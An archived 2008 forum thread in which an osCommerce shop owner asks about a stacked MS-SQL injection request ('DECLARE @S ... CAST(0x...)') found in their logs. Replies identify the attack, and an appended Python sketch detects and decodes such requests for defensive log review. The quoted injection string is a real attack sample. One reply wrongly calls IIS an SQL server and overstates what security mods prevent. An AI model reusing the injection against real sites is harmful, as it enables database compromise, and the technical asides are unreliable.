Brian-Bear Posted October 13, 2008

I have seen this in my last urls list and looks a bit nasty. What are they trying to do?

product_info.php?products_id=1649;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172 283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073 6 56C6563742061

any ideas

Guest Posted October 13, 2008

I can't say what it's trying but I'd agree that it looks a little suspicious and more than just spam.

failsafe Posted October 13, 2008

> I have seen this in my last urls list and looks a bit nasty. What are they trying to do?
>
> product_info.php?products_id=1649;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292...
>
> any ideas

Well it appears to be an IIS / ms-sql injection attack. Looks like you only need to worry about it if your SQL server is Microsoft IIS. Since we're using mySQL for osCommerce (and not ms-sql) then no worries, other than the pain of seeing the request in your logs and the extra bandwidth it generates! :)

If you put "CHAR(4000) injection attack" into Google you can find out about it.

Brian-Bear Posted October 13, 2008

Thanks for the heads up guys.

php_Guy Posted October 14, 2008

Install the Security Mods and they won't be able to attempt that sort of attack any longer.

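An added example, not part of the original thread: a Python sketch for log review that flags requests of the shape quoted in the first post (a stacked DECLARE plus CAST(0x...)) and decodes the hex so the logged statement can be read. The function names are hypothetical, the sample is the truncated request from the first post with the forum's wrap spaces left in, and single-byte text is an assumption.

```python
import re
from urllib.parse import unquote

# Request copied from the first post (truncated there). The spaces inside the
# hex are forum line-wrap residue, kept here to show the decoder tolerates them.
SAMPLE = (
    "product_info.php?products_id=1649;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST("
    "0x4445434C415245204054207661726368617228323535292C40432076617263686172 "
    "283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073 "
    "6 56C6563742061"
)

# A stacked statement after the parameter value, and a hex literal fed to CAST.
STACKED_DECLARE = re.compile(r";\s*DECLARE\s+@\w+", re.IGNORECASE)
CAST_HEX = re.compile(r"CAST\(\s*0x([0-9A-Fa-f\s]+)", re.IGNORECASE)


def decode_cast_payload(request):
    """Return the text hidden in a CAST(0x...) argument, or None if absent."""
    match = CAST_HEX.search(unquote(request))
    if match is None:
        return None
    digits = re.sub(r"\s+", "", match.group(1))
    digits = digits[: len(digits) // 2 * 2]  # drop a half byte left by truncation
    # Assumption: the request declares @S as CHAR(4000), so the payload is
    # treated as single-byte text; latin-1 maps every byte to one character.
    return bytes.fromhex(digits).decode("latin-1")


def is_stacked_cast_injection(request):
    """True when the request carries both the stacked DECLARE and CAST(0x...)."""
    decoded = unquote(request)
    return bool(STACKED_DECLARE.search(decoded) and CAST_HEX.search(decoded))


def review(requests):
    """Map each flagged request to its decoded payload for an analyst to read."""
    return {r: decode_cast_payload(r) for r in requests if is_stacked_cast_injection(r)}


if __name__ == "__main__":
    benign = "product_info.php?products_id=1649"  # constructed normal request
    for request, payload in review([benign, SAMPLE]).items():
        print(request[:60], "->", payload)
```
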
Archived
This topic is now archived and is closed to further replies.